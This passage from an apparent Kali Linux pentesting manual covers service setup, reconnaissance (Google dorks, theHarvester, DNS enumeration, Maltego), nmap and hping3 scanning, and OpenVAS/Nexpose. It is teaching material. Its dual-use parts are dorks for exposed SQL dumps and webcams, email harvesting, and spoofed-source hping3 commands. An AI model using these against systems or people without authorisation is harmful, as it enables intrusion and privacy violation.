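The steps above record the MD5 sums of the moved-aside keys but never compare them with the regenerated keys in /etc/ssh. The script below is an added example, not part of the manual, that makes that comparison: a VM image that ships with pre-generated host keys shares them with every other copy of that image, so a key whose hash is unchanged after dpkg-reconfigure means the host is still using a shared key. The function name compare_host_keys and the key contents used by demo_compare are constructed for the demonstration; on a real VM you would run the check as root against /etc/ssh/default_kali_keys and /etc/ssh.

```shell
#!/bin/sh
# Added example (not from the manual): after moving the shipped host keys to
# default_kali_keys/ and running "dpkg-reconfigure openssh-server", confirm that
# every regenerated key differs from its backed-up copy. An identical hash means
# the regeneration did not happen for that key.

# compare_host_keys OLD_DIR NEW_DIR
# Prints one line per key and returns 0 only if every key was regenerated.
compare_host_keys() {
    old_dir=$1
    new_dir=$2
    problems=0
    for old in "$old_dir"/ssh_host_*; do
        name=$(basename "$old")
        new="$new_dir/$name"
        if [ ! -f "$new" ]; then
            echo "MISSING   $name (not regenerated)"
            problems=$((problems + 1))
            continue
        fi
        old_sum=$(md5sum < "$old" | cut -d' ' -f1)
        new_sum=$(md5sum < "$new" | cut -d' ' -f1)
        if [ "$old_sum" = "$new_sum" ]; then
            echo "UNCHANGED $name ($old_sum)"
            problems=$((problems + 1))
        else
            echo "ok        $name"
        fi
    done
    [ "$problems" -eq 0 ]
}

# demo_compare MODE: builds a constructed pair of key directories in a temporary
# location ("fresh" = all keys regenerated, "stale" = the RSA key left untouched),
# runs the check and returns its exit status. The file contents are sample text,
# not real key material.
demo_compare() {
    tmp=$(mktemp -d)
    mkdir "$tmp/default_kali_keys" "$tmp/ssh"
    for k in rsa ecdsa ed25519; do
        echo "SHIPPED $k PRIVATE KEY (constructed sample)" > "$tmp/default_kali_keys/ssh_host_${k}_key"
        echo "SHIPPED $k PUBLIC KEY (constructed sample)"  > "$tmp/default_kali_keys/ssh_host_${k}_key.pub"
        echo "NEW $k PRIVATE KEY (constructed sample)"     > "$tmp/ssh/ssh_host_${k}_key"
        echo "NEW $k PUBLIC KEY (constructed sample)"      > "$tmp/ssh/ssh_host_${k}_key.pub"
    done
    if [ "$1" = "stale" ]; then
        # simulate a regeneration that left the RSA private key as shipped
        cp "$tmp/default_kali_keys/ssh_host_rsa_key" "$tmp/ssh/ssh_host_rsa_key"
    fi
    compare_host_keys "$tmp/default_kali_keys" "$tmp/ssh"
    status=$?
    rm -rf "$tmp"
    return $status
}

# Real use on the VM, as root, after the dpkg-reconfigure step:
#   compare_host_keys /etc/ssh/default_kali_keys /etc/ssh
```

A non-zero exit from compare_host_keys is the signal to rerun the key generation (or to run ssh-keygen -A) before the service is started; the hashes printed for unchanged keys can be matched directly against the md5sum listing shown earlier in this section.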

VNC Server

In computing, Virtual Network Computing (VNC) is a graphical desktop sharing system that uses
the RFB (Remote Frame Buffer) protocol to remotely control another computer. It transmits the
keyboard and mouse events from one computer to another, relaying the graphical screen
updates back in the other direction, over a network.

root@kali:~# vncserver
You will require a password to access your desktops.
Password: ********
Verify: ********


Password too long - only the first 8 characters will be used

New 'bt:1 (root)' desktop is bt:1
Creating default startup script /root/.vnc/xstartup
Starting applications specified in /root/.vnc/xstartup
Log file is /root/.vnc/bt:1.log

To verify the server is running:

root@kali:~# netstat -antp |grep 5901
tcp6 0 0 :::5901 :::* LISTEN 3480/Xvnc4

To stop the VNC server:

root@kali:~# vncserver -kill :1
Killing Xtightvnc process ID 3480

Apache

Apache is the world's most widely used web server software. It comes pre-installed in Kali. To
start the Apache service:

root@kali:~# service apache2 start

Verify that Apache is running by browsing to 127.0.0.1 or by entering the following command:

root@kali:~# netstat -antp |grep 80
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 4031/apache2

To stop the Apache service:

root@kali:~# service apache2 stop

TFTPD
Trivial File Transfer Protocol (TFTP) is a simple file transfer protocol that allows a client to get
a file from, or put a file onto, a remote host. It allows us to transfer files between two computers.
To start TFTPD, serving files from /tmp on UDP port 69:

root@root:~# atftpd --daemon --port 69 /tmp


To verify that TFTPD is running:

root@kali:~# netstat -anup |grep 69
udp 0 0 0.0.0.0:69 0.0.0.0:* 4545/atftpd

To stop TFTPD, kill the process ID shown in the netstat output:

root@kali:~# kill 4545
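The verification steps for SSH, VNC, Apache and TFTPD above all pipe netstat through grep with a bare port number. That pattern also matches unrelated lines: port 2222, the remote port of an established connection, or a PID that happens to contain the same digits. The function below is an added example, not part of the manual, that anchors on netstat's Local Address column and the LISTEN state instead, so it reports only the process actually bound to the port. The netstat output it parses is a constructed sample assembled from the lines shown in this module plus two decoy lines; the function names are my own.

```shell
#!/bin/sh
# Added example (not from the manual): find which process is listening on a
# given port by parsing "netstat -antp" / "netstat -anup" output read from stdin.
# Matching on the Local Address column and the socket state avoids the false
# positives that a plain "grep PORT" produces.

# listening_pids PORT   (reads netstat -anp style output from stdin)
# Prints the PID of each process listening on PORT, one per line.
listening_pids() {
    awk -v port="$1" '
        # column 4 is Local Address; it must end in ":PORT"
        $4 ~ (":" port "$") {
            if ($1 ~ /^udp/) {
                pidprog = $6          # UDP lines have no State column
            } else if ($6 == "LISTEN") {
                pidprog = $7          # TCP: only listening sockets count
            } else {
                next                  # ESTABLISHED etc. are client sessions
            }
            split(pidprog, parts, "/")
            print parts[1]
        }'
}

# service_is_up PORT: wrapper returning 0 if something listens on PORT.
service_is_up() {
    [ -n "$(listening_pids "$1")" ]
}

# Constructed sample of combined "netstat -antp" and "netstat -anup" output
# (not a real capture): the four services from this module plus two decoys,
# a listener on 2222 and an established SSH session, that a bare "grep 22"
# would also match.
SAMPLE_NETSTAT='tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      4202/sshd
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      5100/nc
tcp        0      0 192.168.1.113:22        192.168.1.5:50122       ESTABLISHED 4310/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      4031/apache2
tcp6       0      0 :::5901                 :::*                    LISTEN      3480/Xvnc4
udp        0      0 0.0.0.0:69              0.0.0.0:*                           4545/atftpd'

# check_sample PORT: runs the parser over the constructed sample.
check_sample() {
    printf '%s\n' "$SAMPLE_NETSTAT" | listening_pids "$1"
}

# Real use on the VM (as root, so that -p can show the program name):
#   netstat -antp | listening_pids 22
#   netstat -anup | listening_pids 69
#   netstat -antp | service_is_up 80 && echo "apache is up"
```

The parser expects netstat's column layout; if a newer Kali release has only ss installed, the Local Address and State columns sit in different positions and the field numbers would need adjusting.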


Module 4: Information Gathering


Google Hacking
Google hacking is the term used when an attacker or tester uses search engines to find exploitable
targets and sensitive data. It is used to find security holes in the configuration and the code that
websites and web applications use. Google hacking involves using advanced operators in the
Google search engine to locate specific strings of text within search results.
Special search operators are used in Google to narrow down results. Here are some advanced
operators:

More details on advanced operators can be found here:

http://www.google.com/help/operators.html

If we want results from only microsoft.com, type site:microsoft.com. This restricts the results to
microsoft.com.


To find all PDF files present on microsoft.com, we will use the following Google query:
filetype:pdf site:microsoft.com


Devices connected to the internet can also be found. Type inurl:"ViewerFrame?Mode=" and we
will find public web cameras.


Google Hacking Database

Google hacking search terms, also known as Google dorks, are collected in a project called the
Google Hacking Database. It can be accessed here:
https://www.exploit-db.com/google-hacking-database

For example, MySQL backups are sometimes left on web servers with a .sql extension. These backups
can contain critical information such as usernames, passwords and credit card numbers. Try the
following search query in Google: mysql dump filetype:sql


Email Harvesting
Email harvesting is the process of obtaining lists of email addresses using various methods. A tool
in Kali named theHarvester gathers email accounts, user names and hostnames/subdomains from
different public sources. Open a terminal and type the following command:

root@root:~# theharvester -d hotmail.com -l 50 -b google

*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.5 *
* Coded by Christian Martorella *
* Edge-Security Research *
* [email protected] *

[-] Searching in Google:


Searching 0 results...
Searching 50 results..

theHarvester collects email addresses from public sources. In the above command, -d hotmail.com
sets the domain to look for, -l 50 limits the search to the first 50 results and -b google selects
Google as the data source; the hotmail.com addresses found in those results are listed.


Netcraft
Netcraft provides web server and web hosting market-share analysis, including web server and
operating system detection. In some cases, depending on the queried server's operating system,
their service is able to monitor uptimes; uptime performance monitoring is a commonly used
factor in determining the reliability of a web hosting provider.
Go to www.netcraft.com and type your website URL, for example tranchulas.com, and you will get a
report about the site.


Nslookup
nslookup is a network administration command-line tool available for many computer operating
systems for querying the Domain Name System (DNS) to obtain domain name or IP address
mapping or for any other specific DNS record.

root@root:~# nslookup
> www.tranchulas.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
www.tranchulas.com canonical name = tranchulas.com.
Name: tranchulas.com
Address: 192.254.191.25

To find mail servers (MX records):

root@root:~# nslookup
> set type=mx
> tranchulas.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
tranchulas.com mail exchanger = 10 aspmx3.googlemail.com.
tranchulas.com mail exchanger = 1 aspmx.l.google.com.
tranchulas.com mail exchanger = 5 alt1.aspmx.l.google.com.
tranchulas.com mail exchanger = 5 alt2.aspmx.l.google.com.
tranchulas.com mail exchanger = 10 aspmx2.googlemail.com.

To find name servers (NS records):

root@root:~# nslookup
> set type=ns
> tranchulas.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
tranchulas.com nameserver = ns6287.hostgator.com.
tranchulas.com nameserver = ns6288.hostgator.com.

DNSEnum

DNSenum is a pentesting tool that enumerates as much DNS information about a domain as
possible: host addresses, name servers, mail servers and subdomains. The -f option supplies the
wordlist used to brute force subdomain names:

root@root:~# dnsenum tranchulas.com -f /usr/share/dnsenum/dns.txt


dnsenum.pl VERSION:1.2.3

----- tranchulas.com -----

Host's addresses:
__________________

tranchulas.com. 14110 IN A 192.254.191.25

Name Servers:
______________

ns6287.hostgator.com. 21423 IN A 50.87.144.180
ns6288.hostgator.com. 21423 IN A 192.254.184.236

Mail (MX) Servers:
___________________

aspmx2.googlemail.com. 293 IN A 173.194.72.27
aspmx3.googlemail.com. 293 IN A 74.125.25.27
aspmx.l.google.com. 226 IN A 74.125.68.26
alt1.aspmx.l.google.com. 293 IN A 173.194.72.26
alt2.aspmx.l.google.com. 126 IN A 74.125.25.27

DNSmap
Dnsmap is mainly meant to be used by pentesters during the information gathering/enumeration
phase of infrastructure security assessments. During the enumeration stage, the security
consultant would typically discover the target company's IP netblocks, domain names, phone
numbers, etc. The tool discovers subdomains associated with a given domain by brute forcing
names from a wordlist (its built-in list by default).

root@root:~# dnsmap tranchulas.com


dnsmap 0.30 - DNS Network Mapper by pagvac (gnucitizen.org)


[+] searching (sub)domains for tranchulas.com using built-in wordlist
[+] using maximum random delay of 10 millisecond(s) between requests

cpanel.tranchulas.com
IP address #1: 192.254.191.25

Maltego
Maltego is an open source application that allows for the mining and gathering of information
as well as the representation of this information in a meaningful way.
Maltego can be used to determine the relationships and real world links between:

• People
• Groups of people (social networks)
• Companies
• Organizations
• Web sites
• Internet infrastructure such as:
o Domains
o DNS names
o Netblocks
o IP addresses
• Phrases
• Affiliations
• Documents and files
These entities are linked using open source intelligence. Maltego provides a graphical interface
that makes these relationships immediately visible, making it possible to see hidden connections.
Maltego can be used for the information gathering phase of all security related work. It will save
you time and let you work more accurately and smarter, aiding your thinking process by visually
showing the links between searched items. Maltego provides a much more powerful search, giving
you smarter results. If access to "hidden" information determines your success, Maltego can help
you discover it.
To open Maltego, type maltego in a terminal:

root@root:~# maltego


Maltego will open a wizard.

Register a new account and login

Select “Maltego Public Servers” and click Next. Now you are good to go.


The left side lists the searchable entities, sorted into Infrastructure and Personnel.


We can use a domain as an example here. Drag and drop domain from searchable options to
main graph area.


On the right side, in the property view, edit the default value paterva.com to your desired domain.

Right-click the domain in the graph and click the required search transform, or just run all
transforms. For more details on transforms please visit:
http://ctas.paterva.com/view/Category:Transforms


Analyze the results. As you can see we have found a lot of information, including but not limited
to email addresses, phone numbers and social networking profiles.
Exercise
Use open web information gathering techniques to find interesting information about your
organization:
1. Domains
2. IP ranges
3. Phone numbers / addresses
4. Emails
5. Interesting documents such as PDF and PPT files


Module 5: Scanning


Introduction to Port Scanning


Since a TCP or UDP port is a place where information goes into and out of a computer, port
scanning identifies open doors to a computer. Port scanning has legitimate uses in managing
networks, but port scanning also can be malicious in nature if someone is looking for a weakened
access point to break into your computer.

TCP Port Scanning


The simplest port scanners use the operating system's network functions (an ordinary connect()
call). If a port is open, the operating system completes the TCP three-way handshake; otherwise
an error code is returned. This scan mode has the advantage that the user does not require special
privileges. The method is "noisy": the services can log the connecting IP address and intrusion
detection systems can raise an alarm.

SYN Scanning
SYN scan is another form of TCP scanning. Rather than using the operating system's network
functions, the port scanner generates raw IP packets itself, and monitors for responses. This scan
type is also known as "half-open scanning", because it never actually opens a full TCP connection.
The port scanner generates a SYN packet. If the target port is open, it will respond with a SYN-
ACK packet. The scanner host responds with a RST packet, closing the connection before the
handshake is completed.

UDP Scanning
UDP is a connectionless protocol so there is no equivalent to a TCP SYN packet. However, if a UDP
packet is sent to a port that is not open, the system will respond with an ICMP port unreachable
message. Most UDP port scanners use this scanning method, and use the absence of a response
to infer that a port is open. However, if a port is blocked by a firewall, this method will falsely
report that the port is open. If the port unreachable message is blocked, all ports will appear
open. This method is also affected by ICMP rate limiting.

Legal Implications

• In June 2003, an Israeli, Avi Mizrahi, was accused by the Israeli Police of the offense of
attempting the unauthorized access of computer material. He had port scanned the
Mossad website. He was acquitted of all charges on February 29, 2004. The judge ruled
that these kinds of actions should not be discouraged when they are performed in a
positive way.


• A 17-year old Finn was accused of attempted computer break-in by a major Finnish bank.
On April 9, 2003, he was convicted of the charge by the Supreme Court and ordered to
pay US$ 12,000 for the expense of the forensic analysis made by the bank. In 1998, he
had port scanned the bank network in an attempt to access the closed network, but failed
to do so.
• In December 1999, Scott Moulton was arrested by the FBI and accused of attempted
computer trespassing under Georgia's Computer Systems Protection Act and Computer
Fraud and Abuse Act of America. At this time, his IT service company had an ongoing
contract with Cherokee County of Georgia to maintain and upgrade the 911 center
security. He performed several port scans on Cherokee County servers to check their
security and eventually port scanned a web server monitored by another IT company,
provoking a tiff which ended up in a tribunal. He was acquitted in 2000, the judge ruling
there was no damage impairing the integrity and availability of the network.

Nmap

• Nmap (“Network Mapper”) is an open source tool for network exploration and security
auditing. [3]
• It was designed to rapidly scan large networks, although it works fine against single hosts.
• Nmap uses raw IP packets in novel ways to determine:
o what hosts are available on the network
o what services (application name and version) those hosts are offering
o what operating systems (and OS versions) they are running
o what type of packet filters/firewalls are in use and dozens of other characteristics.
While Nmap is commonly used for security audits, many systems and network administrators
find it useful for routine tasks such as network inventory, managing service upgrade schedules,
and monitoring host or service uptime.
Let’s run a basic nmap scan on 192.168.2.5:

root@kali:~# nmap 192.168.2.5

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-05 07:11 EST
Nmap scan report for 192.168.2.5
Host is up (0.18s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5357/tcp open wsdapi
49153/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

The port states recognized by Nmap:


Open

An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this
port. Finding these is often the primary goal of port scanning. Security-minded people know that
each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports,
while administrators try to close or protect them with firewalls without thwarting legitimate
users. Open ports are also interesting for non-security scans because they show services available
for use on the network.
Closed
A closed port is accessible (it receives and responds to Nmap probe packets), but there is no
application listening on it. They can be helpful in showing that a host is up on an IP address (host
discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it
may be worth scanning later in case some open up. Administrators may want to consider blocking
such ports with a firewall. Then they would appear in the filtered state, discussed next.
Filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes
from reaching the port. The filtering could be from a dedicated firewall device, router rules, or
host-based firewall software. These ports frustrate attackers because they provide so little
information. Sometimes they respond with ICMP error messages such as type 3 code 13
(destination unreachable: communication administratively prohibited), but filters that simply
drop probes without responding are far more common. This forces Nmap to retry several times
just in case the probe was dropped due to network congestion rather than filtering. This slows
down the scan dramatically.
Unfiltered
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it
is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into
this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN
scan, may help resolve whether the port is open.
Open|filtered

Nmap places ports in this state when it is unable to determine whether a port is open or filtered.
This occurs for scan types in which open ports give no response. The lack of response could also
mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know
for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas
scans classify ports this way.
Closed|filtered
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only
used for the IP ID idle scan.

Scan all available ports


In a basic scan only the 1000 most commonly used ports are scanned. To scan all 65535 TCP ports
we use the following command:

root@kali:~# nmap -p 1-65535 192.168.2.5

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-05 07:11 EST
Nmap scan report for 192.168.2.5
Host is up (0.18s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5357/tcp open wsdapi
49153/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

OS Fingerprinting
Nmap can detect the operating system using TCP/IP stack fingerprinting: it sends a series of TCP
and UDP packets to the remote host and examines practically every bit in the responses.

root@kali:~# nmap -O 192.168.2.8

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-05 08:18 EST
Nmap scan report for 192.168.2.5
Host is up (0.18s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Device type: general purpose|firewall|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X (87%), WatchGuard Fireware 11.X (87%), Synology
Linux (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:watchguard:fireware:11
cpe:/o:synology:linux_kernel cpe:/o:linux:linux_kernel:3
Aggressive OS guesses: Linux 2.6.32 (87%), WatchGuard Fireware 11.8 (87%), Synology
DiskStation Manager 5.1 (86%), Linux 2.6.39 (86%), Linux 3.10 (86%), Linux 3.4 (86%), Linux
2.6.32 - 2.6.35 (85%), Linux 3.1 - 3.2 (85%), Linux 2.6.32 - 2.6.39 (85%), Linux 2.6.38 (85%)

Scanning the network

To scan a single port on every host in the 192.168.2.0/24 range (the * wildcard expands to 0-255):

root@kali:~# nmap -p 80 192.168.2.*

Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-18 10:24 PKT
Nmap scan report for 192.168.2.5
Host is up (0.18s latency).
PORT STATE SERVICE
80/tcp open http

Nmap scan report for 192.168.2.6
Host is up (0.18s latency).
PORT STATE SERVICE
80/tcp open http

Nmap scan report for 192.168.2.7
Host is up (0.18s latency).
PORT STATE SERVICE
80/tcp open http


Service Enumeration

The -sV option probes the open ports to determine the service and version running on each of them:

root@kali:~# nmap -sV 192.168.2.8

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-05 08:01 EST
Nmap scan report for 192.168.2.8
Host is up (0.18s latency).
Not shown: 981 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
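
As an added example (not the manual's own code, nor Nmap's), the following Python script parses the port table of an Nmap normal-output report, including the VERSION column that -sV produces as shown above, and diffs two reports so that services which have newly appeared stand out; this is how a defender turns the basic scan and the -sV scan from this module into a change-detection check. The sample reports are constructed from this page's scan output; the earlier "baseline" scan is an assumption.

```python
# Added example, not from the manual: parse Nmap normal-output port tables and
# diff two reports so newly exposed services stand out. Sample reports are
# constructed from the page's scan output; the baseline scan is an assumption.
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# One row of the PORT/STATE/SERVICE[/VERSION] table, e.g.
#   "80/tcp open http"              (basic scan)
#   "21/tcp open ftp vsftpd 2.3.4"  (-sV scan: VERSION column present)
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+"
    r"(?P<state>open\|filtered|closed\|filtered|open|closed|filtered|unfiltered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)
HOST_LINE = re.compile(r"^Nmap scan report for (?P<host>\S+)")


@dataclass(frozen=True)
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str = ""  # empty unless the report came from a -sV scan


def parse_nmap_report(text: str) -> Dict[str, List[PortEntry]]:
    """Return {host: [PortEntry, ...]} for every host in a normal-output report."""
    hosts: Dict[str, List[PortEntry]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        host = HOST_LINE.match(line)
        if host:
            current = host.group("host")
            hosts.setdefault(current, [])
            continue
        row = PORT_LINE.match(line)
        if row and current is not None:  # header rows like "PORT STATE ..." never match
            hosts[current].append(PortEntry(
                port=int(row.group("port")),
                proto=row.group("proto"),
                state=row.group("state"),
                service=row.group("service"),
                version=(row.group("version") or "").strip(),
            ))
    return hosts


def open_ports(entries: List[PortEntry]) -> Set[Tuple[int, str]]:
    """Only 'open' counts; open|filtered ports need a follow-up scan to resolve."""
    return {(e.port, e.proto) for e in entries if e.state == "open"}


def diff_open_ports(baseline: str, current: str) -> Dict[str, Tuple[Set, Set]]:
    """Per host: (ports newly open since the baseline, ports no longer open)."""
    before = parse_nmap_report(baseline)
    after = parse_nmap_report(current)
    result = {}
    for host in sorted(set(before) | set(after)):
        b = open_ports(before.get(host, []))
        a = open_ports(after.get(host, []))
        result[host] = (a - b, b - a)
    return result


# Constructed baseline (assumed earlier scan): 192.168.2.5 without MySQL or the
# high RPC ports, and 192.168.2.8 not yet present on the network.
BASELINE_SCAN = """
Nmap scan report for 192.168.2.5
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
5357/tcp open wsdapi
"""

# Constructed from the basic scan and the -sV service enumeration on this page.
CURRENT_SCAN = """
Nmap scan report for 192.168.2.5
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5357/tcp open wsdapi
49153/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

Nmap scan report for 192.168.2.8
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
513/tcp open login?
6000/tcp open X11 (access denied)
"""
```

Calling diff_open_ports(BASELINE_SCAN, CURRENT_SCAN) reports 3306/tcp and the three 491xx ports as newly open on 192.168.2.5 and every port of 192.168.2.8 as new, which is the kind of delta worth alerting on when a scheduled scan is compared with the previous one.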

Zenmap
Zenmap is the graphical front end of Nmap. To start it, type zenmap in a terminal.


Nmap Scripting Engine – Basic Usage


Nmap is not only a port scanner but also contains a scripting engine that can execute scripts for
more in-depth discovery of a target.
Nmap includes a variety of ready-made scripts for this purpose. You can run scripts one at a time,
execute scripts by category, or execute multiple scripts at once.
Nmap currently has the following script categories:

Execute SMB Version Scanning Script


The following command executes the smb-os-discovery script, which detects the SMB version and
operating system version details:

root@kali:~# nmap --script smb-os-discovery 192.168.2.9

Run Default Scripts


The default scripts category will expose information about the operating system, the workgroup
name, the netbios names etc.

root@kali:~# nmap --script default 192.168.2.9

Running External Sources Script


The external category contains scripts that query third-party services, such as whois, to discover
additional information like the geographical location, the name of the organization and the net
range.

root@kali:~# nmap --script external tranchulas.com

Hping
Often considered a complementary tool to Nmap, hping is used for network scanning, as well as
crafting TCP/IP packets. Please note that given the packet crafting involved, if you are running as
root yet you receive an error saying that the operation is not permitted it could be due to a host
firewall.
Send TCP SYN packets to port 0 on host example.com (note that hping will increment the source
port by 1 for each packet sent):

hping3 example.com -S -V

Send TCP SYN packets to port 443 on host example.com:

hping3 example.com -S -V -p 443

Send TCP packets to port 443 on host example.com with the SYN + ACK flags set:

hping3 example.com -S -A -V -p 443


Send TCP packets to port 443 on host example.com with the SYN + ACK + FIN flags set:

hping3 example.com -S -A -F -V -p 443

Send TCP SYN packets every 5 seconds to port 443 on host example.com:

hping3 example.com -S -V -p 443 -i 5

Send TCP SYN packets every 100,000 microseconds (i.e. every 0.1 second or 10 per second) to
port 443 on host example.com. Note that verbose has been removed:

hping3 example.com -S -p 443 -i u100000

Send TCP SYN packets every 10,000 microseconds (i.e. every 0.01 second or 100 per second) to
port 443 on host example.com:

hping3 example.com -S -p 443 -i u10000

Send TCP SYN packets every 10,000 microseconds (i.e. every 0.01 second or 100 per second) to
port 443 on host example.com. Stop after 500 packets:

hping3 example.com -S -p 443 -i u10000 -c 500

Send UDP packets to port 111 on host example.com (argument --udp can be substituted with -2):

hping3 example.com --udp -V -p 111

Send ICMP echo request packets to host example.com (argument --icmp can be substituted with
-1):

hping3 example.com --icmp -V

Send ICMP timestamp request packets to host example.com:

hping3 example.com --icmp --icmp-ts -V

Portscan TCP ports 100 to 110 on host example.com (argument --scan can be substituted with -8):

hping3 example.com -V --scan 100-110

Send UDP packets spoofed to be from source host 192.168.1.150 to host example.com


hping3 example.com --udp --spoof 192.168.1.150

Send UDP packets spoofed to be from various random source IP addresses to host example.com

hping3 example.com --udp --rand-source

Send UDP packets with the data portion padded with 100 bytes to host example.com

hping3 example.com -V --udp --data 100

Send UDP packets with the data portion padded with 100 bytes but containing the contents of
payload.txt to host example.com (the payload will be truncated if it is smaller than what is
specified by the --data argument)

hping3 example.com -V --udp --file payload.txt --data 100

Sparta
Sparta is a Python GUI application which simplifies the scanning and enumeration phase. To launch
Sparta, run the following command:

root@kali:# sparta

A GUI is presented to the user


Click to add a host.

Sparta will start an active scan of the host. Sparta uses Nmap in a staged process: it starts with
an initial scan of a limited set of ports, launches Nikto against any web ports and takes a screen
capture. After the stage 1 scan finishes, it starts the much deeper stage 2 and stage 3 scans.


Module 6: Vulnerability Scanning


What is OpenVAS?
The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and
tools offering a comprehensive and powerful vulnerability scanning and vulnerability
management solution.

Setting up and Scanning with OpenVAS

To install OpenVAS:

root@kali:# apt-get install openvas

Select OpenVAS initial setup from the menu. This performs the steps needed to get OpenVAS ready:

Favorites -> Vulnerability Analysis -> openvas initial setup

After the setup completes, check it by clicking openvas check setup in the menu. This reports any
missing OpenVAS components. If the installation is not complete, follow the steps shown in the
results of openvas check setup. It may ask you to sync the SCAP data; for that use the following
command:

openvas-scapdata-sync

Once installed, you need to start the OpenVAS services.


Open the Iceweasel browser on Kali and type the following URL:
https://127.0.0.1:9392 or https://localhost:9392
Confirm the security exception and you will see the login page.

The default username is admin and the password is the one given during the installation process.


Update your vulnerability database feed by clicking Administration -> NVT Feed. After updating
the NVT feed and the CERT feed, go to Scan Targets under the Configuration menu. Here you can
specify the targets.

The next step is to create a task. Click on New task under the menu of scan management.


You can now run the scan.

Nexpose Vulnerability Scanner


Nexpose proactively scans your environment for misconfigurations, vulnerabilities and malware, and
provides guidance for mitigating risks. It automatically discovers and inventories IT assets and the
applications and services running on them, including IPv6, virtual and cloud hosted assets. Nexpose
correlates threats such as vulnerabilities, misconfigurations, policy violations and exposure to
exploits and malware across all of the assets, including operating systems, networks, databases
and web applications. Its prioritization scheme combines CVSS scores with factors such as exposure
to exploits, malware and the age of vulnerabilities into a single prioritized risk score. It also
filters your vulnerabilities across 145 signal categories to easily prioritize remediation and
mitigate risk in your environment. Set up mitigating controls and act on exploitable vulnerabilities
with practical remediation advice.

Installation
1. Nexpose is available online and can be downloaded from:
https://www.rapid7.com/products/nexpose/compare-downloads.jsp

2. Click on Free Trial of Enterprise version.


3. You can select any one of the options. Let’s choose Windows/Linux.
4. Fill the form. You will need a corporate email address to complete the form.

5. Once you have registered, you will get an email containing the key and the link to the
download.


6. Download the Windows file. Nexpose requires a 64-bit machine, and it is recommended that the
machine has 8 GB of RAM.
7. Double click on the installer file

8. Follow the installation steps


9. Select the Default option


10. Create an account for administration.

11. Installation will start. It will take some time to complete

Starting Nexpose

1. Start Nexpose Service.


2. The console will start the web browser. If it doesn’t, go to https://localhost:3780

3. After some time you will be redirected to the login page. Log in using the credentials you set
up during the installation.
4. Enter the product Key you received in the email.

5. After activation, you will get the following screen.


6. Click on Home

7. Click on Create Site


8. Enter the required information

9. Click on Assets
